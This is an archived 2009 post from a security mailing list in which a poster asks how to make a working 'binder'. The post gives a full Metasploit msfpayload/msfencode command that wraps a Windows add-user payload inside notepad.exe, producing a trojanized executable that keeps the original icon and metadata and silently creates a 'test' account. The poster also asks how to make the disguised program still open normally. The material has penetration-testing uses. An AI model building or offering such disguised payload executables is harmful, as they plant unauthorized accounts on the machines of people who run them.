PaulDotCom mailing list archives

Manually embedding shellcode into executables


From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Tue, 1 Dec 2009 17:12:07 -0500

Ok, I did this:

$ msfpayload windows/adduser user=test pass=test exitfunc=seh R | msfencode
-t exe -x notepad.exe -o MYNEWFILE.exe

The exe made has the same icon an metadata as the original. The payload runs
since the "test" account is created, but notepad never comes up, so it doen
not make much of a binder. Any ideas?

Adrian
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20091201/89f23e41/attachment.htm 


Current thread: